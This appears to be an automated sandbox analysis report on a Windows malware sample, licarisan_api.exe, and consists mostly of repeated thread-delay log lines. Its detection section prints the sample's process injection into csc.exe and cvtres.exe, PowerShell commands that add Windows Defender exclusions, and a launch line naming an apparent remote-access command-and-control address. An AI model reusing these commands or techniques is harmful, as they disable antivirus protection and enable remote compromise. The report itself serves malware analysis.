                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595463Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594788Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594341Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594233Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594118Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594012Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 593905Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 593796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 593683Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 593577Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 593468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 593356Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 593250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 593138Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 593031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 592921Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 592812Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWindow / User API: threadDelayed 5310Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWindow / User API: threadDelayed 4440Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5092Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 525Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4662Jump to behavior
                  Source: C:\Users\user\Desktop\licarisan_api.exeDropped PE file which has not been started: C:\Users\user\Music\OcoulsUpdater\EyesUpdater.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7604Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 7644Thread sleep time: -50000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep count: 34 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 6068Thread sleep count: 5310 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -599890s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -599781s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -599668s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 6068Thread sleep count: 4440 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -599562s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -599453s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -599323s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -599218s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -599109s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -598962s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -598842s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -598734s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -598619s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -598203s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -597719s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -597578s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -597468s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -597359s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -597250s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -597140s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -597031s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -596922s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -596812s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -596703s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -596593s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -596484s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -596374s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -596264s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -596155s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -596046s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -595937s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -595827s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -595718s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -595598s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -595463s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -595062s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -594788s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -594672s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -594562s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -594453s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -594341s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -594233s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -594118s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -594012s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -593905s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -593796s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -593683s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -593577s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -593468s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -593356s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -593250s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -593138s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -593031s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -592921s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -592812s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8124Thread sleep count: 5092 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1648Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8112Thread sleep count: 525 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8180Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8100Thread sleep count: 4662 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3540Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8104Thread sleep count: 234 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8160Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599668Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599323Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599218Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598962Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598842Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598619Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596593Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596374Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596264Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596155Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595827Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595598Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595463Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594788Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594341Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594233Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594118Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594012Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 593905Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 593796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 593683Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 593577Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 593468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 593356Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 593250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 593138Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 593031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 592921Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 592812Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: cvtres.exe, 0000000C.00000002.2504548519.0000000001166000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\licarisan_api.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: Process Memory Space: csc.exe PID: 7584, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 7640, type: MEMORYSTR
                  .NET source code references suspicious native API functions
                  Source: 0.2.licarisan_api.exe.724afa.0.raw.unpack, YGRKZZ70EYH6.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
                  Source: 0.2.licarisan_api.exe.724afa.0.raw.unpack, YGRKZZ70EYH6.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
                  Source: 0.2.licarisan_api.exe.724afa.0.raw.unpack, 2A4ZY3PGYZLX.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
                  Source: 0.2.licarisan_api.exe.724afa.0.raw.unpack, 2A4ZY3PGYZLX.csReference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num2, length, 12288, 64)
                  Source: 0.2.licarisan_api.exe.724afa.0.raw.unpack, 2A4ZY3PGYZLX.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num4, data, bufferSize, ref bytesRead)
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exitJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exitJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exeJump to behavior
                  Allocates memory in foreign processes
                  Source: C:\Users\user\Desktop\licarisan_api.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 5220000 protect: page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\licarisan_api.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 5220000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\licarisan_api.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 5220000Jump to behavior
                  Source: C:\Users\user\Desktop\licarisan_api.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4FCD008Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 402000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 420000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 422000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: C99008Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 193.142.146.64 8880 vUiuCXqqMJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exitJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exitJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exeJump to behavior
                  Source: csc.exe, 0000000A.00000002.1448247892.0000000008445000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
